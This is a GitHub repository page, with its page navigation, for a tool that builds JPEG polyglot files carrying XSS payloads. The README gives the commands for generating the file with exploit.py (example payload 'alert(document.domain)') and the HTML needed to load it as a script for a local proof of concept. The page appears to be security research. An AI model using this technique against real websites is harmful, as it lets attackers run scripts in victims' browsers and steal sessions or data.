Skip to content

4n86rakam1/xss_injection_in_jpeg

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
.gitignore
.gitignore
 
 
README.md
README.md
 
 
exploit.py
exploit.py
 
 
index.html
index.html
 
 
poc.png
poc.png
 
 

Repository files navigation

Exploiting XSS with JPEG Polyglot

Requirement

  • ImageMagick

Usage

sudo apt install imagemagick  # in debian

git clone https://github.com/4n86rakam1/xss_injection_in_jpeg.git
cd xss_injection_in_jpeg
python3 exploit.py --payload 'alert(document.domain)' --imagesize 200x200 --output xss.js

Test

  1. Confirm to generate JavaScript file for exploiting XSS.

  2. Change src attribute value in index.html to your output filename.

    e.g.

    <!DOCTYPE html>
<html lang="en">
<head>
    <script charset="ISO-8859-1" src="./xss.js"></script>
</head>
<body></body>
</html>

  3. Run HTTP Server.

    e.g.

    python3 -m http.server

  4. open http://localhost:8000 in browser.

    POC

tested in Google Chrome Version 114.0.5735.106 (Official Build) (64-bit).

References

About

Exploiting XSS with JPEG Polyglot

Topics

jpg exploit jpeg xss polyglot

Resources

Readme
Activity

Stars

2 stars

Watchers

0 watching

Forks

0 forks
Report repository

Languages